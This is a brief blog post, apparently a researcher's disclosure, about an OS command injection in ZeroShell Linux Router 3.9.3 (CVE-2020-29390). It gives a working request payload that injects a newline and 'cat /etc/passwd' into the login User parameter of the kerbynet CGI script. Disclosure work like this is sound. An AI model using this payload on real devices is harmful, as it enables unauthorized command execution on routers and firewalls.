ZeroShell Linux Router 3.9.3 OS Command Injection vulnerability(CVE-2020-29390)

Posted Aug 9, 2020 Updated Jun 18, 2024

By tomcat 1 min read

Vendor:

Zeroshell Linux Router

https://zeroshell.org/

Product:

ZeroShell-3.9.3-X86.iso

https://zeroshell.org/download/

Zeroshell is a Linux based distribution dedicated to the implementation of Router and Firewall Appliances completely administrable via web interface. > Zeroshell is available for x86/x86-64 platforms and ARM based devices such as Raspberry Pi.

OS Command Injection

When I reviewed the earlier vulnerabilities in zeroshell, I discovered that an OS Command Injection vulnerability still exists in its latest version. You can download here.

Payload: /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat /etc/passwd%0a'&PW=

Reference

Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution
https://cwe.mitre.org/data/definitions/78.html

vulnerability, ZeroShell

This post is licensed under CC BY 4.0 by the author.

Vendor:

Product:

OS Command Injection

Reference

Trending Tags